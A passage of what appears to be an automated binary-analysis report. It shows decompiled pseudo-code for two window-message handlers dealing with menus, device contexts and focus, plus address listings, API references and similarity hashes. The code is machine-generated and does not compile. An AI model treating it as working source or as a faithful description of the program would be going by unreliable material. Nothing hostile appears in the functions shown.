				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44993b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E004487B4(E00413FA4(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x486c60; // 0x487bfc
								E00455E7C( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00413FA4(_v8, _t368);
									_t295 = _v17;
									_v16 = E004486F8(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00432818( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x486c60; // 0x487bfc
								E00455E7C( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00413FA4(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E004486F8(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00448FF8(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E00413FA4(_v8, _t370);
								_t181 = E00448798( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E004486F8(E00413FA4(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041F488(0, 1);
								_push(_t377);
								_push(0x44976e);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x449751);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E0041FE44(_v24,  *(_v40 + 0x18));
								E0041FCC0(_v24);
								E00449BE0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x449758);
								__eflags = 0;
								E0041FE44(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E004486F8(E00413FA4(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406F20();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041F488(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E0041FE44(_v24, _v32);
									E0041FCC0(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44986f, _t377,  *[fs:eax], 0x44988c, _t377,  *[fs:eax], 0x4498b1, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x449876);
									__eflags = 0;
									E0041FE44(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413FA4(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E004486F8(E00413FA4(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00413FA4(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E00448728(E00413FA4(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E00413FA4(_v8, _t373);
											__eflags = 0;
											_t257 = E00448728(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x486dac; // 0x487c00
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x486dac; // 0x487c00
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x486c60; // 0x487bfc
												E00455B18( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E00455B80();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00406CF8();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x449942);
								return E00404320( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                                                                0x00449409
                                                                                0x0044940b
                                                                                0x00449413
                                                                                0x00449416
                                                                                0x00449418
                                                                                0x0044941d
                                                                                0x0044941e
                                                                                0x00449423
                                                                                0x00449426
                                                                                0x00449429
                                                                                0x0044942b
                                                                                0x00449430
                                                                                0x00449452
                                                                                0x00449452
                                                                                0x00449457
                                                                                0x004494a6
                                                                                0x004494a7
                                                                                0x004494a9
                                                                                0x00000000
                                                                                0x004494af
                                                                                0x004494af
                                                                                0x004494b0
                                                                                0x004494b0
                                                                                0x004494b2
                                                                                0x004494bf
                                                                                0x004494c4
                                                                                0x004494c6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004494cc
                                                                                0x004494cd
                                                                                0x004494cd
                                                                                0x004494ce
                                                                                0x00000000
                                                                                0x004494d0
                                                                                0x00000000
                                                                                0x004494d0
                                                                                0x00000000
                                                                                0x004494ce
                                                                                0x004494b2
                                                                                0x00449459
                                                                                0x00449459
                                                                                0x00449459
                                                                                0x0044945c
                                                                                0x004494d5
                                                                                0x004494d9
                                                                                0x004494dd
                                                                                0x004494df
                                                                                0x004494df
                                                                                0x004494e9
                                                                                0x004494ea
                                                                                0x004494ec
                                                                                0x00449562
                                                                                0x00449562
                                                                                0x0044956b
                                                                                0x00000000
                                                                                0x004494ee
                                                                                0x004494ee
                                                                                0x004494ef
                                                                                0x004494ef
                                                                                0x004494f1
                                                                                0x004494f1
                                                                                0x004494f5
                                                                                0x0044951b
                                                                                0x004494f7
                                                                                0x004494f7
                                                                                0x004494fa
                                                                                0x004494fc
                                                                                0x0044950e
                                                                                0x004494fe
                                                                                0x00449509
                                                                                0x00449509
                                                                                0x004494fc
                                                                                0x00449523
                                                                                0x00449528
                                                                                0x00449533
                                                                                0x00449536
                                                                                0x0044953a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044955e
                                                                                0x0044955f
                                                                                0x0044955f
                                                                                0x00449560
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449560
                                                                                0x00449545
                                                                                0x0044954d
                                                                                0x00449554
                                                                                0x00449554
                                                                                0x0044945e
                                                                                0x0044945e
                                                                                0x0044945f
                                                                                0x004498c8
                                                                                0x004498c9
                                                                                0x004498cb
                                                                                0x00000000
                                                                                0x004498cd
                                                                                0x004498cd
                                                                                0x004498ce
                                                                                0x004498ce
                                                                                0x004498d0
                                                                                0x004498da
                                                                                0x004498e2
                                                                                0x004498e5
                                                                                0x004498e8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498f2
                                                                                0x004498f7
                                                                                0x004498f9
                                                                                0x00449907
                                                                                0x00449908
                                                                                0x00449908
                                                                                0x00449909
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498f9
                                                                                0x00449900
                                                                                0x00449900
                                                                                0x00449465
                                                                                0x00000000
                                                                                0x00449465
                                                                                0x0044945f
                                                                                0x0044945c
                                                                                0x00000000
                                                                                0x00449432
                                                                                0x00449432
                                                                                0x00449470
                                                                                0x00449471
                                                                                0x00449473
                                                                                0x00000000
                                                                                0x00449479
                                                                                0x00449479
                                                                                0x0044947a
                                                                                0x0044947a
                                                                                0x0044947c
                                                                                0x00449481
                                                                                0x0044948a
                                                                                0x0044948f
                                                                                0x00449491
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449497
                                                                                0x00449498
                                                                                0x00449498
                                                                                0x00449499
                                                                                0x00000000
                                                                                0x0044949b
                                                                                0x00000000
                                                                                0x0044949b
                                                                                0x00000000
                                                                                0x00449499
                                                                                0x0044947c
                                                                                0x00000000
                                                                                0x00449434
                                                                                0x00449434
                                                                                0x00449437
                                                                                0x0044967a
                                                                                0x00449683
                                                                                0x00449684
                                                                                0x00449686
                                                                                0x00000000
                                                                                0x0044968c
                                                                                0x0044968c
                                                                                0x0044968d
                                                                                0x0044968d
                                                                                0x0044968f
                                                                                0x004496a6
                                                                                0x004496a9
                                                                                0x004496ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449775
                                                                                0x00449776
                                                                                0x00449776
                                                                                0x00449777
                                                                                0x00000000
                                                                                0x0044977d
                                                                                0x00000000
                                                                                0x0044977d
                                                                                0x00000000
                                                                                0x00449777
                                                                                0x004496bf
                                                                                0x004496c4
                                                                                0x004496c5
                                                                                0x004496ca
                                                                                0x004496cd
                                                                                0x004496dc
                                                                                0x004496e1
                                                                                0x004496e2
                                                                                0x004496e7
                                                                                0x004496ea
                                                                                0x004496f6
                                                                                0x0044970b
                                                                                0x00449724
                                                                                0x0044972b
                                                                                0x0044972e
                                                                                0x00449731
                                                                                0x00449736
                                                                                0x0044973b
                                                                                0x00449750
                                                                                0x00449750
                                                                                0x0044943d
                                                                                0x0044943d
                                                                                0x0044943e
                                                                                0x00449785
                                                                                0x0044978e
                                                                                0x0044978f
                                                                                0x00449791
                                                                                0x00000000
                                                                                0x00449797
                                                                                0x00449797
                                                                                0x00449798
                                                                                0x00449798
                                                                                0x0044979a
                                                                                0x004497b1
                                                                                0x004497b4
                                                                                0x004497b8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498b8
                                                                                0x004498b9
                                                                                0x004498b9
                                                                                0x004498ba
                                                                                0x00000000
                                                                                0x004498c0
                                                                                0x00000000
                                                                                0x004498c0
                                                                                0x00000000
                                                                                0x004498ba
                                                                                0x004497c1
                                                                                0x004497c5
                                                                                0x004497ca
                                                                                0x004497d8
                                                                                0x004497e7
                                                                                0x004497f5
                                                                                0x00449801
                                                                                0x0044980f
                                                                                0x00449818
                                                                                0x0044982d
                                                                                0x00449847
                                                                                0x0044984c
                                                                                0x0044984f
                                                                                0x00449852
                                                                                0x00449857
                                                                                0x0044985c
                                                                                0x0044986e
                                                                                0x0044986e
                                                                                0x00449444
                                                                                0x00449447
                                                                                0x00449578
                                                                                0x00449581
                                                                                0x00449582
                                                                                0x00449584
                                                                                0x00000000
                                                                                0x0044958a
                                                                                0x0044958a
                                                                                0x0044958b
                                                                                0x0044958b
                                                                                0x0044958d
                                                                                0x00449599
                                                                                0x0044959c
                                                                                0x0044959f
                                                                                0x004495a2
                                                                                0x004495cd
                                                                                0x004495a4
                                                                                0x004495b1
                                                                                0x004495b1
                                                                                0x004495d0
                                                                                0x004495d4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044966a
                                                                                0x0044966b
                                                                                0x0044966b
                                                                                0x0044966c
                                                                                0x00000000
                                                                                0x00449672
                                                                                0x00000000
                                                                                0x00449672
                                                                                0x00000000
                                                                                0x0044966c
                                                                                0x004495ec
                                                                                0x004495f1
                                                                                0x004495f3
                                                                                0x004495fa
                                                                                0x00449605
                                                                                0x00449607
                                                                                0x00449607
                                                                                0x0044960c
                                                                                0x00449614
                                                                                0x00449617
                                                                                0x00449619
                                                                                0x0044961f
                                                                                0x00449621
                                                                                0x00449628
                                                                                0x00449628
                                                                                0x0044962e
                                                                                0x00449634
                                                                                0x0044963b
                                                                                0x00449657
                                                                                0x00449660
                                                                                0x0044963d
                                                                                0x0044964d
                                                                                0x0044964d
                                                                                0x0044963b
                                                                                0x00449619
                                                                                0x0044944d
                                                                                0x0044990b
                                                                                0x0044990e
                                                                                0x00449912
                                                                                0x00449915
                                                                                0x00449919
                                                                                0x0044991c
                                                                                0x0044991d
                                                                                0x00449922
                                                                                0x00449922
                                                                                0x00449925
                                                                                0x00449927
                                                                                0x0044992a
                                                                                0x0044992d
                                                                                0x0044993a
                                                                                0x0044993a
                                                                                0x0044943e
                                                                                0x00449437
                                                                                0x00449432
                                                                                0x00000000

                                                                                APIs
                                                                                • SaveDC.GDI32(?), ref: 004496D7
                                                                                • RestoreDC.GDI32(?,?), ref: 0044974B
                                                                                • 72E7B080.USER32(?,00000000,0044993B), ref: 004497C5
                                                                                • SaveDC.GDI32(?), ref: 004497FC
                                                                                • RestoreDC.GDI32(?,?), ref: 00449869
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044993B), ref: 0044991D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: RestoreSave$B080NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4024241980-0
                                                                                • Opcode ID: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction ID: a45c3f59b09cd28d2ba5bdec491db0630d48655138bc4fa014f9cd7e6cd3b5ed
                                                                                • Opcode Fuzzy Hash: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction Fuzzy Hash: BFE16E74A046099FEB10DF6AC48199FF3F5FF89304B2185AAE815A7325C738ED42DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044EEEC, Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0044EEEC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				struct HDC__* _t184;
				intOrPtr* _t207;
				intOrPtr _t232;
				intOrPtr _t238;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				intOrPtr* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t207 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t263 = _t92 - 0x46;
				if(_t263 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037B0(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037B0(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t116 = _v8;
						_t232 =  *0x44f31c; // 0x1
						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x44f318);
						if(_t232 == ( *(_t116 + 0x1c) &  *0x44f318)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x46bb18;
							if( *0x46bb18 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t255 = E0043BD14(_t138);
												}
											}
										} else {
											_t141 = E0044F74C(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t255 = E0043BD14(E0044F74C(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041F488(0, 1);
											_push(_t258);
											_push(0x44f162);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x44f145);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E0041FE44(_v16,  *(_v24 + 0x18));
											E0041FCC0(_v16);
											E00449BE0(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0x44f14c);
											__eflags = 0;
											E0041FE44(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t256 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t256 - 1;
									if( *_t256 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t184 = E0043BD14(_v8);
												L00406F20();
												_v20 = _t184;
												 *[fs:eax] = _t261;
												_v16 = E0041F488(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E0041FE44(_v16, _v20);
												E0041FCC0(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x44f24c, _t258,  *[fs:eax], 0x44f269, _t258,  *[fs:eax], 0x44f290, _t258, _t184);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x44f253);
												__eflags = 0;
												E0041FE44(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 =  *_t207 -  *0x487c08; // 0xc075
									if(_t267 == 0) {
										E00436848(_v8, 0, 0xb025, 0);
										E00436848(_v8, 0, 0xb024, 0);
										E00436848(_v8, 0, 0xb035, 0);
										E00436848(_v8, 0, 0xb009, 0);
										E00436848(_v8, 0, 0xb008, 0);
										E00436848(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E004397C4(_v8, _t207);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}







































                                                                                0x0044eeed
                                                                                0x0044eeef
                                                                                0x0044eef5
                                                                                0x0044eef7
                                                                                0x0044eefa
                                                                                0x0044eefc
                                                                                0x0044eeff
                                                                                0x0044ef24
                                                                                0x0044ef24
                                                                                0x0044ef29
                                                                                0x0044efd5
                                                                                0x0044efdc
                                                                                0x0044efe9
                                                                                0x0044efe9
                                                                                0x0044ef2f
                                                                                0x0044ef2f
                                                                                0x0044ef30
                                                                                0x0044efb4
                                                                                0x0044efbb
                                                                                0x0044efc8
                                                                                0x0044efc8
                                                                                0x0044ef32
                                                                                0x00000000
                                                                                0x0044ef32
                                                                                0x0044ef30
                                                                                0x00000000
                                                                                0x0044ef01
                                                                                0x0044ef01
                                                                                0x0044eff3
                                                                                0x0044f001
                                                                                0x0044f008
                                                                                0x0044f00b
                                                                                0x0044f011
                                                                                0x0044f01b
                                                                                0x0044f01d
                                                                                0x0044f01f
                                                                                0x0044f022
                                                                                0x0044f029
                                                                                0x0044f02b
                                                                                0x0044f02e
                                                                                0x0044f02e
                                                                                0x0044f02e
                                                                                0x0044f02e
                                                                                0x0044f029
                                                                                0x0044f03b
                                                                                0x0044f03b
                                                                                0x0044f03d
                                                                                0x0044f047
                                                                                0x0044f050
                                                                                0x0044f050
                                                                                0x0044f052
                                                                                0x0044f05c
                                                                                0x0044f05f
                                                                                0x0044f054
                                                                                0x0044f054
                                                                                0x0044f056
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044f056
                                                                                0x0044f03f
                                                                                0x0044f03f
                                                                                0x0044f041
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044f041
                                                                                0x0044f03d
                                                                                0x00000000
                                                                                0x0044ef07
                                                                                0x0044ef0a
                                                                                0x0044ef0d
                                                                                0x0044ef37
                                                                                0x0044ef3e
                                                                                0x0044ef44
                                                                                0x0044ef47
                                                                                0x00000000
                                                                                0x0044ef4d
                                                                                0x0044ef4d
                                                                                0x0044ef50
                                                                                0x0044ef54
                                                                                0x00000000
                                                                                0x0044ef5a
                                                                                0x0044ef5a
                                                                                0x0044ef5c
                                                                                0x0044ef5f
                                                                                0x0044ef66
                                                                                0x0044ef88
                                                                                0x0044ef8e
                                                                                0x0044ef90
                                                                                0x0044ef92
                                                                                0x0044ef95
                                                                                0x0044ef9c
                                                                                0x0044ef9c
                                                                                0x0044ef95
                                                                                0x0044ef68
                                                                                0x0044ef6b
                                                                                0x0044ef70
                                                                                0x0044ef72
                                                                                0x0044ef81
                                                                                0x0044ef81
                                                                                0x0044ef72
                                                                                0x0044ef9e
                                                                                0x0044efa0
                                                                                0x00000000
                                                                                0x0044efa6
                                                                                0x0044efa7
                                                                                0x0044efa7
                                                                                0x0044efa0
                                                                                0x0044ef54
                                                                                0x0044ef47
                                                                                0x00000000
                                                                                0x0044ef0f
                                                                                0x0044ef0f
                                                                                0x0044ef12
                                                                                0x0044f06b
                                                                                0x0044f071
                                                                                0x0044f074
                                                                                0x00000000
                                                                                0x0044f07a
                                                                                0x0044f07a
                                                                                0x0044f07d
                                                                                0x0044f084
                                                                                0x00000000
                                                                                0x0044f08a
                                                                                0x0044f0a0
                                                                                0x0044f0a2
                                                                                0x0044f0a4
                                                                                0x00000000
                                                                                0x0044f0aa
                                                                                0x0044f0b6
                                                                                0x0044f0bb
                                                                                0x0044f0bc
                                                                                0x0044f0c1
                                                                                0x0044f0c4
                                                                                0x0044f0d3
                                                                                0x0044f0d8
                                                                                0x0044f0d9
                                                                                0x0044f0de
                                                                                0x0044f0e1
                                                                                0x0044f0ed
                                                                                0x0044f100
                                                                                0x0044f118
                                                                                0x0044f11f
                                                                                0x0044f122
                                                                                0x0044f125
                                                                                0x0044f12a
                                                                                0x0044f12f
                                                                                0x0044f144
                                                                                0x0044f144
